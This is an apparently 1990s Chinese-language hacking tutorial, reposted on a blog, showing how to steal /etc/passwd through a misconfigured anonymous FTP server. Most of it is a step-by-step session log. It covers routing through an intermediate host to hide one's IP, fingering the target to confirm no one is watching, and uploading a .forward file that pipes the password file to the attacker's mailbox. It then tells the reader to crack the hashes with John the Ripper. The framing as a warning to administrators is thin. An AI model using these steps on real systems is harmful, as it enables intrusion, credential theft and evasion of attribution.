[前言]

對於著作這份文章的目的並不是在於教育.因為個人覺得台灣的網路雖然已經有所發展了...但是對於網路安全的重要性卻是漠不關心..或者是沒有足夠的知識....這是相當危險的一個現象..就算是大專院校.政府機構.公司行號...甚至是網路業者.ISP對於網路安全和系統管理的正確觀念和態度實在是相當缺乏...所以說不定在往後的日子裡,只要一台cp和一台數據機,就可以讓整個台灣網路崩潰....甚至是引起經濟危機!!就像是一個小孩子拿著一把槍在路上逛一樣...Too Bad!!所以我寫這篇文章純粹是為了台灣網路安全而寫的.並不希望有人因為這篇文章而去做違法的事情~~尤其是破壞別人的系統或是檔案!!
當然啦~如果有人因此做了違法的事情,本人概不負責!!!
"水能載舟也覆舟"....只是告訴你駭客是如何入侵你的系統.
好像說要做F&Q..如果位對於網路系統安全有問題的可以寫信來問我!!當然我也不是GOD不是說每一個問題我一定會~~但是我會盡力回答每一個人的問題,並不會說不知道就假裝沒看到這個問題,ok?

[主題]

匿名FTP的漏洞 (Anonymous FTP)

[困難度]

普通

[說明]

目前有很多的主機都有提供匿名FTP的服務,而方便和安全性卻是魚與熊掌不能兩得的!!就像我以前說的,現在的系統管理員大多數都是缺少專業觀念的!!!對於FTP也是一樣,很多系統管理員都為了避免麻煩就用系統的預設設定來提供FTP這個服務.而anonymous ftp卻是有許多漏洞須要我們去探討的.

哇~~今天說話的口氣怎麼變得好專業阿!!

[開始]

今天就先說明一下台灣目前anonymous ftp最常犯的錯誤!然而這些錯誤卻常常是系統安全的大漏洞.

一開始先說明怎麼把整個/etc/passwd抓回來.再說明如何任意的不用密碼就能進入系統.

如果ftp的根目錄是可以寫入的或是可以執行程式.那你就可以把系統的/etc/passwd給抓回來了!!方法就是先做一個傳送檔 .forward,然後ftp到主機上用anonymous進入.把你做的.forward 上傳到它的根目錄下.確定上傳完畢後就可以離開了!在寄一封e-mail給那個主機的anonymous的帳號..大多帳號是ftp!然後你就可以去收收你的信箱了..什麼還不懂阿?
意思就是說/etc/passwd已經傳到你的信箱了啦!趕快存好,拿約翰出來跑路吧!!

其方法說明如下:



SunOS 5.6

login: lovegone
Password:
Last login: Sat May 16 19:07:41 from 11.22.203.122
tcsh: getwd: Cannot open directory "../" (Permission denied)
tcsh: Trying to start from "/home/judge4"
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
Copyright by Andrew Chen 98/01/07
You have new mail.
#

(嘿嘿..先連到我的中間伺服器! 有人問說[一定要先有一個主機來當中間伺服器才能hack別人的主機嗎?].當然不是這個意思啦!先連上中間伺服器只是要用來掩飾自己的ip嘛!而且可以利用中間伺服器來使用Net-Man2所說的那些"中間動作"阿!!所以中間伺服器不是說一定要用,但是卻是很重要喔..)


# finger @www.fuck.com.tw

[cc.fuck.com.tw]
Login Name TTY Idle When Where
root Super-User console 10: Tue 09:05 :0

(沒人在家...真好)


# ftp www.fuck.com.tw
Connected to cc.fuck.com.tw.
220 cc FTP server (Version wu-2.4(1) Thu May 30 18:00:41 CST 1996) ready.
Name (www.fuck.com.tw:lovegone): anonymous (或是ftp,只要先匿名進去就好了)
331 Guest login ok, send your complete e-mail address as password.
Password:
230-
230- ###### ##### #####
230- # # # #
230- ##### # # #
230- # # #####
230- # # #
230- # # #
230-
230- **** 歡迎到fuck爛公司 ****
230-
230- IE40 : pub/ie40 : 正式版.非搶鮮版
230- pub/ie40zip: ie40 zip.
230-
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

(不愧是fuck爛公司.連ftp也都是wu-2.4的..漏洞大的"狠")


ftp> pwd
257 "/" is current directory.

(看一下自己在那裡,因為有些ftp會一開始就在帳號的工作目錄下.我們要確保是在根目錄下!如果不是在根目錄下的人就用cd ..就可以到根目錄了)

ftp> ls

(看根目錄的設定)

200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 18
drwxr-xr-x 7 fuck Taiwan 512 Oct 16 1997 .
drwxr-xr-x 7 fuck Taiwan 512 Oct 16 1997 ..
lrwxrwxrwx 1 fuck Taiwan 7 Jun 17 1997 bin -> usr/bin
dr-xr-xr-x 2 fuck Taiwan 512 May 31 1996 dev
d--x--x--x 2 fuck Taiwan 512 May 31 1996 etc
dr-xr-xr-x 15 ftp Taiwan 512 Feb 13 03:40 pub
drwxr-xr-x 2 ftp Taiwan 512 Apr 13 05:59 upload
drwxr-xr-x 5 fuck Taiwan 512 May 31 1996 usr
-rw-r--r-- 1 fuck Taiwan 488 Oct 8 1997 welcome.msg
226 Transfer complete.

("狠"好!根目錄是drwxr-xr-x 可以執行程式.趕快去做一個.forward吧!!!)

ftp> bye
Goodbye!

# echo "|/bin/mail Lovegone@ms7.accmail.com.tw" > shit

(用echo和輸出導向就可以了..)

# ls -la


total 26
drwxr-xr-x 4 lovegone users 1024 May 14 13:56 ./
drwxr-xr-x 47 root root 1024 Nov 26 14:08 ../
-rw-r--r-- 1 lovegone users 2217 May 14 13:56 .bash_history
-rw-r--r-- 1 lovegone users 164 Jun 10 1996 .kermrc
-rw-r--r-- 1 lovegone users 34 Jun 7 1993 .less
-rw-r--r-- 1 lovegone users 114 Nov 24 1993 .lessrc
drwxr-xr-x 2 lovegone users 1024 Jun 10 1996 .term/
-rw-rw-r-- 1 lovegone users 6116 May 7 1997 m-2.gif
-rw------- 1 lovegone users 9382 May 14 13:49 mbox
drwxr-xr-x 8 lovegone users 1024 Jul 28 1997 public_html/
-rw-r--r-- 1 lovegonw users 8 Jul 5 1998 shit

(ok了!!接下來就是把shit上傳到www.fuck.com.tw上當.forward)

# ftp www.fuck.com.tw
Connected to cc.fuck.com.tw.
220 cc FTP server (Version wu-2.4(1) Thu May 30 18:00:41 CST 1996) ready.
Name (www.fuck.com.tw:lovegone): anonymous (或是ftp,只要先匿名進去就好了)
331 Guest login ok, send your complete e-mail address as password.
Password:
230-
230- ###### ##### #####
230- # # # #
230- ##### # # #
230- # # #####
230- # # #
230- # # #
230-
230- **** 歡迎到fuck爛公司 ****
230-
230- IE40 : pub/ie40 : 正式版.非搶鮮版
230- pub/ie40zip: ie40 zip.
230-
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put shit .forward

(上傳記得要改成 .forward才行,別在用shit)

200 PORT command successful.
226 Transfer complete.

ftp> bye
Goodbye!

(寄一封信給anonymous這個帳號..然後去收收你的信箱吧!)


[Love-gone的話]

想不到竟然只說了利用 .forward來傳/etc/passwd的方法!至於任意進出系統而不用密碼的方法就只好等下次再說了...別說我又偷懶了!

最近都沒有繼續的寫文章了,必竟hack只是興趣而已!而生活中卻有很多事要做..好累人 :-(雖然hack只是興趣,但是love-gone卻是很認真的喲 !! love-gone希望以後能夠從事跟電腦相關的工作,但是台灣的填鴨式教育卻讓love-gone很吃力 :-(

希望love-gone還是能有空來幫喜歡hack的朋友寫文章或回答問題 :-)

[感言]

還是老話一句...系統漏洞大都都是人為的疏失!!這是很重要的一點,希望是系統管理員的讀者看到這文章能有所改進.


arrow
arrow
    全站熱搜

    Neo Chao 發表在 痞客邦 留言(0) 人氣()